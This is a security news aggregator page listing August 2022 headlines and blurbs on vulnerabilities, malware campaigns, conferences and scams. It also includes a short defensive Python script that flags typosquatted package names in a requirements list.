https://gbhackers.com/researchers-hacked-spacex-operated-starlink-satellite-using-25-modchip/

White Hat Hacker at DefCon Jailbreaks Tractor to Play Doom
By Waqas. The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere tractor models…
https://www.hackread.com/defcon-hacker-jaikbreaks-tractor-play-doom-game/

Two more malicious Python packages in the PyPI
We used our internal automated system for monitoring open-source repositories and discovered two more malicious Python packages on PyPI. They were masquerading as one of the most popular open-source packages, “requests”.
https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/
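A check that follows from the entry above, as an added example rather than Kaspersky's own tooling: it flags names in a requirements list that resemble a popular package, generalizing the "masquerading as requests" case to a small edit-distance test plus an embedded-name test against a list of popular names. The popular-package list, the misspellings and the requirements list are constructed for the demo; the output is a review list, not a verdict, since legitimate packages such as a "-stubs" companion will show up too.

```python
"""Flag dependency names that resemble a popular package (added example).

Normalizes names the way PyPI does (PEP 503) and reports any dependency that is
within a small edit distance of a popular package, or that embeds a popular
package name with a short prefix or suffix. Output is a review list, not a
verdict: legitimate packages such as "<popular>-stubs" will show up too.
"""
import re

# Constructed list for illustration; a real check would use a larger, current list.
POPULAR = ["requests", "urllib3", "numpy", "pandas", "django", "flask",
           "cryptography", "boto3", "setuptools", "pyyaml"]

# Constructed requirements list; the misspellings are made up for the demo.
SAMPLE_REQUIREMENTS = ["requests", "reqeusts", "requets", "numpy", "pandas-stubs", "colorama"]


def normalize(name):
    """PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Edit distance (insert, delete, substitute) computed with a single rolling row."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,                 # delete from a
                               current[j - 1] + 1,              # insert into a
                               previous[j - 1] + (ca != cb)))   # substitute
        previous = current
    return previous[-1]


def lookalikes(dependencies, popular=POPULAR, max_distance=2, max_extra=8):
    """Return [(dependency, popular_name, reason)] for names worth a second look."""
    popular_norm = [normalize(p) for p in popular]
    findings = []
    for dep in dependencies:
        name = normalize(dep)
        if name in popular_norm:
            continue                         # exact match, nothing to flag
        for pop in popular_norm:
            distance = levenshtein(name, pop)
            if distance <= max_distance:
                findings.append((dep, pop, f"edit distance {distance}"))
                break
            if pop in name and len(name) - len(pop) <= max_extra:
                findings.append((dep, pop, "embeds popular name"))
                break
    return findings


if __name__ == "__main__":
    for dep, pop, reason in lookalikes(SAMPLE_REQUIREMENTS):
        print(f"{dep}: resembles {pop} ({reason})")
```

Run it over a parsed requirements.txt or lock file in CI and fail the build only on the edit-distance hits; the embedded-name hits are better routed to a human, because prefixes and suffixes are exactly how both typosquatters and legitimate companion packages name themselves.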

Threat in your browser: what dangers innocent-looking extensions hold for users
In this research, we observed various types of threats that mimic useful web browser extensions, and the number of users attacked by them.
https://securelist.com/threat-in-your-browser-extensions/107181/

News from previous days

Researcher Hacked Space-X Starlink Via A $25 Tool
A white-hat hacker demonstrated how he hacked SpaceX's satellite-based internet system Starlink. The researcher could successfully…
https://latesthackingnews.com/2022/08/15/researcher-hacked-space-x-starlink-via-a-25-tool/

How to become a video game tester
If you grew up in the early 2000s like I did, you might have seen…
https://latesthackingnews.com/2022/08/15/how-to-become-a-video-game-tester/

Xiaomi Phones' TEE Vulnerability May Allow Forged Mobile Payments
Researchers discovered a serious security vulnerability in MediaTek-powered Xiaomi phones that allows forging mobile payments due…
https://latesthackingnews.com/2022/08/15/xiaomi-phones-tee-vulnerability-may-allow-forge-mobile-payments/

Research Finds Facebook Tracks In-App Browser Activities On iOS Devices
A researcher noticed Facebook tracking users' activities on iOS devices when using the in-app browser…
https://latesthackingnews.com/2022/08/14/research-finds-facebook-tracks-in-app-browser-activities-on-ios-devices/

Researchers Discover Zimbra Authentication Bypass Flaw Under Attack
A severe authentication bypass vulnerability existed in the Zimbra Collaboration Suite (ZCS), risking email security…
https://latesthackingnews.com/2022/08/14/researchers-discover-zimbra-authentication-bypass-flaw-under-attack/

Palo Alto Warns About PAN-OS Vulnerability Under Attack
Technology giant Palo Alto Networks alerted its users to a severe PAN-OS vulnerability that allows…
https://latesthackingnews.com/2022/08/14/palo-alto-warns-about-pan-os-vulnerability-under-attack/

Microsoft Patch Tuesday August Fixes 120+ Vulnerabilities
This week brought Microsoft's monthly Patch Tuesday updates for August…
https://latesthackingnews.com/2022/08/14/microsoft-patch-tuesday-august-fixes-120-vulnerabilities/

Credential Theft Is (Still) A Top Attack Method
Credential theft is clearly still a problem. Even after years of warnings, changing password requirements, and multiple forms of authentication, password stealing remains a top attack method used by cyber criminals. The latest report from the Ponemon Institute shares that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks. 59% of organizations
https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html

Newly Uncovered PyPI Package Drops Fileless Cryptominer to Linux Systems
A now-removed rogue package pushed to the official third-party software repository for Python has been found to deploy cryptominers on Linux systems. The module, named "secretslib" and downloaded 93 times prior to its deletion, was released to the Python Package Index (PyPI) on August 6, 2022 and is described as "secrets matching and verification made easy." "On a closer
https://thehackernews.com/2022/08/newly-uncovered-pypi-package-drops.html

Tornado Cash Developer Arrested After U.S. Sanctions the Cryptocurrency Mixer
Dutch authorities on Friday announced the arrest of a software developer in Amsterdam who is alleged to be working for Tornado Cash, days after the U.S. sanctioned the decentralized crypto mixing service. The 29-year-old individual is "suspected of involvement in concealing criminal financial flows and facilitating money laundering" through the service, the Dutch Fiscal Information and
https://thehackernews.com/2022/08/tornado-cash-developer-arrested-after.html

Chinese Hackers Backdoored MiMi Chat App to Target Windows, Linux, macOS Users
A pair of reports from cybersecurity firms SEKOIA and Trend Micro sheds light on a new campaign undertaken by a Chinese threat actor named Lucky Mouse that involves leveraging a trojanized version of a cross-platform messaging app to backdoor systems. Infection chains leverage a chat application called MiMi, with its installer files compromised to download and install HyperBro samples for the
https://thehackernews.com/2022/08/chinese-hackers-backdoored-mimi-chat.html

Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders
A security feature bypass vulnerability has been uncovered in three signed third-party Unified Extensible Firmware Interface (UEFI) boot loaders that allows UEFI Secure Boot to be bypassed. "These vulnerabilities can be exploited by mounting the EFI System Partition and replacing the existing bootloader with the vulnerable one, or modifying a UEFI variable to load the vulnerable loader
https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html

U.S. Government Offers $10 Million Reward for Information on Conti Ransomware Gang
The U.S. State Department on Thursday announced a $10 million reward for information related to five individuals associated with the Conti ransomware group. The reward offer is also notable for the fact that it marks the first time the face of a Conti associate, known as "Target," has been unmasked. The four other alleged members have been referred to as "Tramp," "Dandis," "Professor," and "
https://thehackernews.com/2022/08/us-government-offers-10-million-reward.html

Facebook Testing Default End-to-End Encryption and Encrypted Backups in Messenger
Social media company Meta said it will begin testing end-to-end encryption (E2EE) on its Messenger platform this week for select users as the default option, as the company continues to slowly add security layers to its various chat services. "If you're in the test group, some of your most frequent chats may be automatically end-to-end encrypted, which means you won't have to opt in to the
https://thehackernews.com/2022/08/facebook-testing-default-end-to-end.html

Cisco Patches High-Severity Vulnerability Affecting ASA and Firepower Solutions
Cisco on Wednesday released patches to contain multiple flaws in its software that could be abused to leak sensitive information on susceptible appliances. The issue, assigned the identifier CVE-2022-20866 (CVSS score: 7.4), has been described as a "logic error" when handling RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)
https://thehackernews.com/2022/08/cisco-patches-high-severity.html

Fast and Secure VPN on a Budget? Private Internet Access VPN Has You Covered
Back when the internet consisted of a handful of computers networked together across a few research institutions, nobody could have imagined that it would one day form the backbone of a new digital way of life. And that probably explains why none of the researchers who thought up its core technologies — things like packet switching and TCP/IP — gave much consideration to the need to secure the
https://thehackernews.com/2022/08/fast-and-secure-vpn-on-budget-private.html

Containers Vulnerability Scanner: Trivy
This article talks about Trivy, a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for continuous integration and testing.
https://www.hackingarticles.in/containers-vulnerability-scanner-trivy/

MimiKatz for Pentester: Kerberos
This write-up is part of a series of articles on the tool Mimikatz, which was written in C. It is…
https://www.hackingarticles.in/mimikatz-for-pentester-kerberos/

Caldera: Red Team Emulation (Part 1)
This article aims to demonstrate an open-source breach and emulation framework through which red team activity can be conducted with ease. It focuses on MITRE…
https://www.hackingarticles.in/caldera-red-team-emulation-part-1/

Domain Escalation: Unconstrained Delegation
Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible…
https://www.hackingarticles.in/domain-escalation-unconstrained-delegation/

Domain Persistence: Silver Ticket Attack
Benjamin Delpy (the creator of Mimikatz) introduced the silver ticket attack at Black Hat 2014 in his session on abusing Kerberos. Silver tickets are forged service…
https://www.hackingarticles.in/domain-persistence-silver-ticket-attack/

A Detailed Guide on Rubeus
Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used…
https://www.hackingarticles.in/a-detailed-guide-on-rubeus/

Process Herpaderping (Mitre:T1055)
Johnny Shaw demonstrated a defense evasion technique known as process herpaderping, in which an attacker is able to inject malicious code into the mapped…
https://www.hackingarticles.in/process-herpaderping-mitret1055/

A Detailed Guide on Hydra
Hello! Pentesters, this article is about the brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent…
https://www.hackingarticles.in/a-detailed-guide-on-hydra/

A Detailed Guide on HTML Smuggling
HTML smuggling is an evasive payload delivery method that helps an attacker smuggle a payload past content filters and firewalls by hiding malicious payloads inside…
https://www.hackingarticles.in/a-detailed-guide-on-html-smuggling/

A Detailed Guide on Medusa
Hi Pentesters! Let's learn about a different tool, Medusa, which is intended to be a speedy, parallel and modular login brute forcer. The goal of…
https://www.hackingarticles.in/a-detailed-guide-on-medusa/

Germany to mandate minimum security standards for web browsers in government
Less celebrated browsers and deprecated applications like Internet Explorer will be browsers non-grata
https://portswigger.net/daily-swig/germany-to-mandate-minimum-security-standards-for-web-browsers-in-government

Healthcare provider Novant issues data breach warning after site tracking pixels sent patients' information to Meta servers
Leaked data potentially included patients' email addresses, phone numbers, and device IP addresses
https://portswigger.net/daily-swig/healthcare-provider-novant-issues-data-breach-warning-after-site-tracking-pixels-sent-patients-information-to-meta-servers

IT industry guilty of ‘lack of imagination’ in failure to anticipate cyber-attack evolution
‘We have a habit of reacting to threats after they occur, rather than preparing for them,’ journalist Kim Zetter tells Black Hat
https://portswigger.net/daily-swig/it-industry-guilty-of-lack-of-imagination-in-failure-to-anticipate-cyber-attack-evolution

BHUSA: Make sure your security bug bounty program doesn't create a data leak of its own
Researchers, organizations, and bug disclosure platforms can all make improvements to help protect user data
https://portswigger.net/daily-swig/bhusa-make-sure-your-security-bug-bounty-program-doesnt-create-a-data-leak-of-its-own

GoTestWAF adds API attack testing via OpenAPI support
CI/CD support is next for WAF security tool
https://portswigger.net/daily-swig/gotestwaf-adds-api-attack-testing-via-openapi-support

Black Hat USA: Pen testing tool that aims to ‘keep the fun in hacking’ unveiled
Latest version of AttackForge ReportGen DevSecOps aid demonstrated during conference Arsenal track
https://portswigger.net/daily-swig/black-hat-usa-pen-testing-tool-that-aims-to-keep-the-fun-in-hacking-unveiled

Browser-powered desync: New class of HTTP request smuggling attacks showcased at Black Hat USA
Renowned researcher James Kettle demonstrates his latest attack technique in Las Vegas
https://portswigger.net/daily-swig/browser-powered-desync-new-class-of-http-request-smuggling-attacks-showcased-at-black-hat-usa

ReNgine upgrade: New subscan feature, PDF reports, expanded toolbox showcased at Black Hat USA
Open source recon tool automates some of the more time-consuming pen testing tasks
https://portswigger.net/daily-swig/rengine-upgrade-new-subscan-feature-pdf-reports-expanded-toolbox-showcased-at-black-hat-usa

Black Hat USA: Deliberately vulnerable AWS, Azure cloud infrastructure is a pen tester's playground
AWSGoat and AzureGoat tools showcased in Las Vegas this week
https://portswigger.net/daily-swig/black-hat-usa-deliberately-vulnerable-aws-azure-cloud-infrastructure-is-a-pen-testers-playground

Black Hat USA: Log4j de-obfuscator Ox4Shell ‘dramatically' reduces analysis time
Open source utility exposes payloads without running vulnerable Java code
https://portswigger.net/daily-swig/black-hat-usa-log4j-de-obfuscator-ox4shell-dramatically-reduces-analysis-time

Black Hat USA: Ex-CISA director Chris Krebs urges orgs to bolster infrastructure amid Taiwan tensions
Attack on Taiwan seemingly a case of ‘when’ not ‘if’. Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the sh
https://portswigger.net/daily-swig/black-hat-usa-ex-cisa-director-chris-krebs-urges-orgs-to-bolster-infrastructure-amid-taiwan-tensions

Cisco router flaw gives patient attackers full access to small business networks
Vulnerable path is reachable just once a day, but patches still need to be implemented as a matter of priority
https://portswigger.net/daily-swig/cisco-router-flaw-gives-patient-attackers-full-access-to-small-business-networks

Microsoft Edge deepens defenses against malicious websites with enhanced security mode
Browser adds defense in depth to prevent abuse of unpatched vulnerabilities
https://portswigger.net/daily-swig/microsoft-edge-deepens-defenses-against-malicious-websites-with-enhanced-security-mode

Simple IDOR vulnerability in Reddit allowed mischief-makers to perform mod actions
Bug fixed within 24 hours and ,000 bug bounty awarded
https://portswigger.net/daily-swig/simple-idor-vulnerability-in-reddit-allowed-mischief-makers-to-perform-mod-actions

The best Black Hat and DEF CON talks of all time
Pwn stars
https://portswigger.net/daily-swig/the-best-black-hat-and-def-con-talks-of-all-time

XSS in Gmail's AMP For Email earns researcher $5,000
Researcher bypasses email filter with inspired style tag trickery
https://portswigger.net/daily-swig/xss-in-gmails-amp-for-email-earns-researcher-5-000

High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to exploitation
Now-patched RCE bug impacts dozens of DrayTek Vigor router models
https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation

Authentication bypass bug in Nextauth.js could allow email account takeover
Vulnerability has been patched in latest versions
https://portswigger.net/daily-swig/authentication-bypass-bug-in-nextauth-js-could-allow-email-account-takeover

Chromium site isolation bypass allows wide range of attacks on browsers
Flaw that opened the door to cookie modification and data theft resolved
https://portswigger.net/daily-swig/chromium-site-isolation-bypass-allows-wide-range-of-attacks-on-browsers

ParseThru: HTTP parameter smuggling flaw uncovered in several Go applications
Harbor, Traefik, and Skipper projects tackle unsafe URL parsing methods
https://portswigger.net/daily-swig/parsethru-http-parameter-smuggling-flaw-uncovered-in-several-go-applications

Swiss government announces upcoming launch of federal bug bounty program
Bug Bounty Switzerland AG awarded program management contract
https://portswigger.net/daily-swig/swiss-government-announces-upcoming-launch-of-federal-bug-bounty-program

Jenkins security: Unpatched XSS, CSRF bugs included in latest plugin advisory
‘We believe that announcing vulnerabilities without a fix is the best solution for a difficult problem’
https://portswigger.net/daily-swig/jenkins-security-unpatched-xss-csrf-bugs-included-in-latest-plugin-advisory

Trio of XSS bugs in open source web apps could lead to complete system compromise
Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact
https://portswigger.net/daily-swig/trio-of-xss-bugs-in-open-source-web-apps-could-lead-to-complete-system-compromise

‘You get respect for owning what happened’ – SolarWinds' CISO on the legacy and lessons of Sunburst
Security chief counts new build system and greater intel sharing among positive legacies of watershed cyber-attack
https://portswigger.net/daily-swig/you-get-respect-for-owning-what-happened-solarwinds-ciso-on-the-legacy-and-lessons-of-sunburst

CompleteFTP path traversal flaw allowed attackers to delete server files
Security issue fixed in version 22.1.1 of file transfer software
https://portswigger.net/daily-swig/completeftp-path-traversal-flaw-allowed-attackers-to-delete-server-files

GitHub Actions workflow flaws provided write access to projects including Logstash
Malicious builds and wider infrastructural compromise were worst-case scenarios
https://portswigger.net/daily-swig/github-actions-workflow-flaws-provided-write-access-to-projects-including-logstash

XSS vulnerabilities in Google Cloud, Google Play could lead to account hijacks
Reflected XSS and DOM-based XSS bugs net researchers ,000 and ,000 bug bounties
https://portswigger.net/daily-swig/xss-vulnerabilities-in-google-cloud-google-play-could-lead-to-account-hijacks

Bug Bounty Radar // The latest bug bounty programs for August 2022
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-august-2022

GitHub enhances 2FA for NPM, improves security and manageability
New features also include ability to connect social media accounts
https://portswigger.net/daily-swig/github-enhances-2fa-for-npm-improves-security-and-manageability

Onfido bug bounty program launched to help shore up ID verification defenses
Initiative adds another layer of protection for end-to-end identity verification platform
https://portswigger.net/daily-swig/onfido-bug-bounty-program-launched-to-help-shore-up-id-verification-defenses

One in five data breaches due to software supply chain compromise, IBM report warns
Attack vector cost businesses 2.5% more in one year
https://portswigger.net/daily-swig/one-in-five-data-breaches-due-to-software-supply-chain-compromise-ibm-report-warns

Open-Xchange issues fixes for RCE, SSRF bugs in OX App Suite
Security release also includes precautionary patches for potential Log4j-like flaw in Logback library
https://portswigger.net/daily-swig/open-xchange-issues-fixes-for-rce-ssrf-bugs-in-ox-app-suite

FileWave MDM authentication bypass bugs expose managed devices to hijack risk
‘Vast majority’ of users have updated systems thanks to vendor warnings
https://portswigger.net/daily-swig/filewave-mdm-authentication-bypass-bugs-expose-managed-devices-to-hijack-risk

Critical security vulnerability in Grails could lead to remote code execution
Maintainers warn to patch all versions of open source web app framework – even those not deemed vulnerable
https://portswigger.net/daily-swig/critical-security-vulnerability-in-grails-could-lead-to-remote-code-execution

Cloud fax company claims healthcare pros are ditching email for ‘more secure’ fax
The fax is dead. Long live the online fax? A new study suggests many healthcare professionals believe that flaws in today's web security landscape are prompting a return to what's been deemed an “extr
https://portswigger.net/daily-swig/cloud-fax-company-claims-healthcare-pros-are-ditching-email-for-more-secure-fax

Cisco patches dangerous bug trio in Nexus Dashboard
Inadequate access control and CSRF protections spawn critical and high severity issues
https://portswigger.net/daily-swig/cisco-patches-dangerous-bug-trio-in-nexus-dashboard

Black Hat USA 2022: Burnout, a significant issue
The digital skills gap, especially in cybersecurity, is not a new phenomenon. The problem is now exacerbated by the prevalence of burnout, a topic presented at Black Hat USA 2022.
https://www.welivesecurity.com/2022/08/15/black-hat-2022-burnout-significant-issue/

Black Hat – Windows isn't the only mass casualty platform anymore
Windows used to be the big talking point when it came to exploits resulting in mass casualties. Nowadays, the talk has turned to other massive attack platforms like cloud and cars.
https://www.welivesecurity.com/2022/08/15/black-hat-cloud-hacking-casualty-platform/

The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe
The NHS was the victim of a potential cyberattack, which raises the question of what such data breaches mean for the public.
https://www.welivesecurity.com/videos/data-breach-romance-scams-week-in-security-with-tony-anscombe/

Black Hat 2022‑ Cyberdefense in a global threats era
Our security evangelist's take on the first day of Black Hat 2022, where cyberdefense was on every mind.
https://www.welivesecurity.com/2022/08/12/black-hat-2022-cyberdefense-ukraine/

Safety first: how to tweak the settings on your dating apps
Tinder, Bumble or Grindr - popular dating apps depend heavily on your location, personal data, and loose privacy settings. Find out how to put yourself out there safely by following our suggested settings tweaks.
https://www.welivesecurity.com/2022/08/12/safety-first-how-to-tweak-the-settings-on-your-dating-apps/

An eighties classic – Zero Trust
A deep dive into zero trust, to help you navigate a zero-trust world and further secure your organization.
https://www.welivesecurity.com/2022/08/11/building-trust-zero-trust-channelcon/

How to check if your PC has been hacked, and what to do next
Has your PC been hacked? Whatever happens, don't panic. Read on for ten signs your PC has been hacked and handy tips on how to fix it.
https://www.welivesecurity.com/2022/08/09/howto-check-hacked-pc/

Develop a zero‑trust environment to protect your organization – Week in security with Tony Anscombe
Learn the basics of zero trust, and how building a zero-trust environment can protect your organization.
https://www.welivesecurity.com/videos/develop-a-zero-trust-environment-to-protect-your-organization-week-in-security-with-tony-anscombe/

Don't get singed by scammers while you're carrying the torch for Tinder
Are you on Tinder? With 75 million monthly active users, you might be able to find the right one. However, there are also traps you need to look out for. Read more about catfishing, sextortion, phishing and other practices used by scammers.
https://www.welivesecurity.com/2022/08/04/protect-yourself-scammers-tinder-dating-app/

Start as you mean to go on: the top 10 steps to securing your new computer
Whether you are getting ready for back-to-school season, getting a new work laptop or fancying a new gaming PC, learn the steps to protect your new PC from cyberthreats.
https://www.welivesecurity.com/2022/08/02/10-steps-securing-your-new-computer/

Music streaming platform victim of a crypto theft – Week in security with Tony Anscombe
Cybercriminals exploited a vulnerability to steal the equivalent of $18M from the NFT music streaming platform Audius, while other cyberthreats related to crypto make the news.
https://www.welivesecurity.com/videos/music-nft-platform-victim-of-a-crypto-theft-week-in-security-with-tony-anscombe/

Staying safe online: How to browse the web securely
Learn to spot some of the threats that you can face while browsing online, and the best tips to stay safe on the web.
https://www.welivesecurity.com/2022/07/29/staying-safe-online-browse-web-securely/

Cash App fraud: 10 common scams to watch out for
It pays to be careful – here's how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash.
https://www.welivesecurity.com/2022/07/27/cash-app-fraud-scams-watch-out/

NFT: A new‑fangled trend or also a new‑found treasure?
I've created an NFT so you don't have to – here's the good, the bad and the intangible of the hot-ticket tokens.
https://www.welivesecurity.com/2022/07/25/nft-new-fangled-trend-new-found-treasure/

macOS malware: myth vs. reality – Week in security with Tony Anscombe
ESET research shows yet again that macOS is not immune to malware and why some users can benefit from Apple's Lockdown Mode.
https://www.welivesecurity.com/videos/macos-malware-myth-vs-reality-week-security-tony-anscombe/

ESET Research Podcast: Hot security topics at RSA or mostly hype?
Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron's insights into the security of medical devices.
https://www.welivesecurity.com/2022/07/20/eset-research-podcast-hot-security-topics-rsa-or-mostly-hype/

I see what you did there: A look at the CloudMensis macOS spyware
Previously unknown macOS malware uses cloud storage as its C&C channel and to exfiltrate documents, keystrokes, and screen captures from compromised Macs.
https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/

Think twice before downloading pirated games – Week in security with Tony Anscombe
Why downloading pirated video games may ultimately cost you dearly and how to stay safe while gaming online.
https://www.welivesecurity.com/videos/think-twice-downloading-pirated-games-week-security-tony-anscombe/

API security moves mainstream
The heavyweights are now moving into API security, cementing it as “A Thing”.
https://www.welivesecurity.com/2022/07/14/api-security-moves-mainstream/

Collaboration and knowledge sharing key to progress in cybersecurity
In a world of ever-evolving cyberthreats, collaboration and knowledge exchange are vital for keeping an edge on attackers.
https://www.welivesecurity.com/2022/07/13/collaboration-knowledge-sharing-key-progress-cybersecurity/

Play it safe: 5 reasons not to download pirated games
It's all fun and games until you get hacked – and this is just one risk of downloading cracked games.
https://www.welivesecurity.com/2022/07/12/play-it-safe-5-reasons-not-download-pirated-games/

Avoid travel digital disasters – Week in security with Tony Anscombe
Vacations are a great time to unwind, but if you're not careful, you may face a digital disaster. Here's how to keep your devices and data secure while you're on the move.
https://www.welivesecurity.com/videos/avoid-travel-digital-disasters-week-security-tony-anscombe/

Driving to France this summer? Watch out for scam websites before you go
Scammers don't take the summer off – be on your guard when buying your Crit'Air sticker.
https://www.welivesecurity.com/2022/07/08/driving-france-summer-watch-out-scam-websites/

8 common Facebook Marketplace scams and how to avoid them
Here's what to watch out for when buying or selling stuff on the online marketplace and how to tell if you're being scammed.
https://www.welivesecurity.com/2022/07/06/8-common-facebook-marketplace-scams-how-avoid/

Cyberattacks: A very real existential threat to organizations
One in five organizations has teetered on the brink of insolvency after a cyberattack. Can your company keep hackers at bay?
https://www.welivesecurity.com/2022/07/04/cyberattacks-real-existential-threat-organizations/

Watch out for survey scams – Week in security with Tony Anscombe
As scammers continue to ask people to take fake surveys, can you recognize some common telltale signs you're dealing with a scam?
https://www.welivesecurity.com/videos/watch-out-survey-scams-week-security-tony-anscombe/

Phishing scam poses as Canadian tax agency before Canada Day
The lead-up to the Canada Day festivities has brought a tax scam with it.
https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/

Costco 40th anniversary scam targets WhatsApp users
If the promise of a cash prize in return for answering a few questions sounds like a deal that is too good to be true, that's because it is.
https://www.welivesecurity.com/2022/06/30/costco-40th-anniversary-scam-targets-whatsapp-users/

Do back offices mean backdoors?
The war in Europe is a reminder for shared service centers and shoring operations to re-examine their IT security posture.
https://www.welivesecurity.com/2022/06/29/do-back-offices-mean-backdoors/

5 ways cybercriminals steal credit card details
Here are some of the most common ways hackers can get hold of other people's credit card data – and how you can keep yours safe.
https://www.welivesecurity.com/2022/06/27/5-ways-cybercriminals-steal-credit-card-details/

Instagram's new age verification tool – Week in security with Tony Anscombe
As Instagram tests a new age verification tool, what are some of the concerns when it comes to confirming someone's age on the internet?
https://www.welivesecurity.com/videos/instagrams-new-age-verification-tool-week-security-tony-anscombe/

Virtual private networks: 5 common questions about VPNs answered
(Almost) everything you always wanted to know about virtual private networks, but were afraid to ask.
https://www.welivesecurity.com/2022/06/23/virtual-private-networks-5-common-questions-vpns-answered/

Phishing awareness training: Help your employees avoid the hook
Educating employees about how to spot phishing attacks can strike a much-needed blow for network defenders.
https://www.welivesecurity.com/2022/06/21/phishing-awareness-training-help-employees-avoid-hook/

Crypto mixers: What are they and how are they used?
How crypto mixers, also known as crypto tumblers, are used to obscure the trail of digital money.
https://www.welivesecurity.com/2022/06/20/crypto-mixers-what-are-they-how-are-they-used/

How to spot malicious spam – Week in security with Tony Anscombe
As the risk of receiving a malware-laden email increases, take a moment to consider how to spot attacks involving malicious spam.
https://www.welivesecurity.com/videos/how-spot-malicious-spam-week-security-tony-anscombe/

How Emotet is changing tactics in response to Microsoft's tightening of Office macro security
Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents?
https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/

Industroyer: A cyber‑weapon that brought down a power grid
Five years ago, ESET researchers released their analysis of the first ever malware that was designed specifically to attack power grids.
https://www.welivesecurity.com/2022/06/13/industroyer-cyber-weapon-brought-down-power-grid/

3 takeaways from RSA Conference 2022 – Week in security with Tony Anscombe
Here are three themes that stood out at the world's largest gathering of cybersecurity professionals.
https://www.welivesecurity.com/videos/takeaways-rsa-conference-2022-week-in-security-with-tony-anscombe/

RSA – APIs, your organization's dedicated backdoors
API-based data transfer is so rapid, there's but little time to stop very bad things happening quickly.
https://www.welivesecurity.com/2022/06/10/rsa-apis-your-organizations-dedicated-backdoors/

RSA – Creepy real‑world edition
Digital fiddling somehow got mixed up in a real war.
https://www.welivesecurity.com/2022/06/09/rsa-creepy-real-world-edition/

RSA – Digital healthcare meets security, but does it really want to?
Technology is understandably viewed as a nuisance to be managed in pursuit of the health organizations' primary mission.
https://www.welivesecurity.com/2022/06/08/rsa-digital-healthcare-meets-security-does-really-want/

RSA – Spot the real fake
How erring on the side of privacy might ultimately save you from chasing down a virtual rendition of you doing the bidding of a scammer.
https://www.welivesecurity.com/2022/06/07/rsa-spot-the-real-fake/

Cybersecurity awareness training: What is it and what works best?
Give employees the knowledge needed to spot the warning signs of a cyberattack and to understand when they may be putting sensitive data at risk.
https://www.welivesecurity.com/2022/06/07/cybersecurity-awareness-training-what-is-it-what-works-best/

Key insights from ESET's latest Threat Report – Week in security with Tony Anscombe
A review of the key trends that defined the threatscape in the first four months of 2022 and what these developments mean for your cyber-defenses.
https://www.welivesecurity.com/videos/key-stats-eset-threat-report-t%e2%80%8a12022/

100 days of war in Ukraine: How the conflict is playing out in cyberspace
It's been 100 days since Russia invaded Ukraine, and we look back at various cyberattacks connected to the conflict.
https://www.welivesecurity.com/2022/06/03/100-days-war-ukraine-conflict-cyberspace/

ESET Threat Report T 1 2022
A view of the T 1 2022 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts.
https://www.welivesecurity.com/2022/06/02/eset-threat-report-t12022/

Talking to children about the internet: A kid's perspective
A 14-year-old shares his thoughts about technology and the potential privacy and security implications of the internet.
https://www.welivesecurity.com/2022/06/01/talking-children-internet-kids-perspective/

Keeping it real: Don't fall for lies about the war
Falsehoods about the war in Ukraine come in all shapes and sizes – here are a few examples of what's in the fake news.
https://www.welivesecurity.com/2022/05/30/keeping-it-real-dont-fall-lies-war/

H1-702 Las Vegas Day 3: Switching Up Scopes

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-3-switching-scopes

H1-702 Las Vegas Day 2: Hacking with Zoom

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-2-hacking-zoom

H1-702 Las Vegas Day 1: H@cktivitycon

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-1-hcktivitycon

H1-702 Las Vegas Day 0: Setup

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-0-setup

PayPal's Third LHE Brings Top Global Hackers to the Virtual Stage
After ten years of partnering with hackers, PayPal is a leader in cybersecurity and hacker relationship building. We were thrilled to work with PayPal once again to uncover new ways to reduce their risk and build proactive security practices.
https://www.hackerone.com/community-blog/paypals-third-lhe-brings-top-global-hackers-virtual-stage

Benchmark Analysis: Annual Pentest and Code Review Coverage

https://www.hackerone.com/penetration-testing/benchmark-analysis-annual-pentest-and-code-review-coverage

5 Articles to Get You Up-to-Speed on Bug Bounty Programs
Many organizations use bug bounty programs to help them protect their ever-expanding attack surface and achieve attack resistance. Bug bounties, with ethical hackers at the helm, uncover critical and severe vulnerabilities before bad actors and deliver better protection against cyberattacks. But what is a bug bounty, and should your organization have one?
https://www.hackerone.com/vulnerability-management/5-articles-get-you-speed-bug-bounty-programs

Ten Rules to be Successful in Your Bug Bounty Career

https://www.hackerone.com/hackerone-community-blog/ten-rules-be-successful-your-bug-bounty-career

Security Highlights: New CWE Rankings, Software Supply Chains, and Side-Channel Attacks

